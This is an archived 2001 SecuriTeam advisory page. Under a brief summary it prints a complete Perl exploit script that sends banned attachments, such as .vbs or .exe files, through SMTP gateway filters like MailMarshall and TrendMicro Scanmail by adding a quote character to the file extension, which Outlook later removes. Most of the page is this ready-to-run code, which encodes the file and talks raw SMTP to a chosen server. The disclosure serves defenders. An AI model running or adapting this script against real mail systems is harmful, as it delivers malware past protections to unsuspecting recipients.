Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Exploit Code Released for the SMTP Attachment Protection Bypass 24 Jul. 2001    Summary The following exploit code allows sending of banned attachments through the SMTP gateways by adding invalid characters to the filename. Since Outlook removes these invalid characters without informing the user of their presence, an attacker is able to send a file with an invalid file name (for example, a Virus with a file ending with a .vbs) through the SMTP gateway, and when it actually arrives to the user, outlook will strip the invalid characters leaving just the dangerous extension (.vbs in this case). This vulnerability is known to work on MailMarshall and TrendMicro Scanmail, and it is assumed that others are probably vulnerable.   Credit: The information has been provided by Aidan. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Exploit: #!/usr/bin/perl # attqt.pl 0.1 by Aidan O'Kelly July 2001 # Send banned attachments through SMTP gateways, this works because MS Outlook removes illegal # characters in filenames. So when you put an illegal char (such as ") in the extension. The Gateway will # not recognize it as a dangerous attachment. However, when the user on the other end opens it the illegal # char will be removed. # # Feedback welcome. aidan.ok@oceanfree.net # # This is known to work on MailMarshall and TrendMicro Scanmail. Others have not been tested but most are # probably vulnerable. If it works on any others, please mail me and let me know. # This only puts in one quote after the dot (eg virus."vbs or virus."exe) # Some gateways might still pick up on the vbs. you can put in more or different # charachters like virus.%v"b********s if you feel like it. # $filename =~ s/\./\.\"/g; is the line that changes it. use Getopt::Std; use MIME::Base64 qw(encode_base64); use IO::Socket::INET; getopt('atfhsb'); if (!$opt_a || !$opt_f || !$opt_t || !$opt_h) {   print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost> [-s subject] [-b text]\n";   exit; } open(FILE, $opt_a) or die "$!"; binmode FILE;    while (read(FILE, $buf, 60*57)) {        $attachment = $attachment . encode_base64($buf);    } close(FILE); $filename = $opt_a; $filename =~ s/\./\.\"/g; print "$filename\n"; $sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp'); unless (<$sock> =~ "220") { die "Not a SMTP Server?" } print $sock "HELO you\r\n"; unless (<$sock> =~ "250") { die "HELO failed" } print $sock "MAIL FROM:<>\r\n"; unless (<$sock> =~ "250") { die "MAIL FROM failed" } print $sock "RCPT TO:<$opt_t>\r\n"; unless (<$sock> =~ "250") { die "RCPT TO failed" } print $sock "DATA\r\n"; unless (<$sock> =~ "354") { die "DATA failed" } print $sock "From: $opt_f\n"; print $sock "To: $opt_t\n"; print $sock "Subject: $opt_s\n"; print $sock "MIME-Version: 1.0 Content-Type: multipart/related;         type=\"multipart/alternative\";         boundary=\"NextPart19\" This is a multi-part message in MIME format. --NextPart19 Content-Type: multipart/alternative;         boundary=\"NextPart20\" --NextPart20 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable --NextPart20 Content-Type: text/html;         charset=\"iso-8859-1\" Content-Transfer-Encoding: quoted-printable "; print $sock "$opt_b\n"; print $sock "--NextPart20-- --NextPart19 Content-Type: application/x-msdownload Content-Disposition: attachment;filename=\"$filename\" Content-Transfer-Encoding: base64\r\n\n"; print $sock $attachment; print $sock "\r\n--NextPart19--\n.\n"; print "Finished sending data\n"; $a = <$sock>; print "$a\n"; close($sock);  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®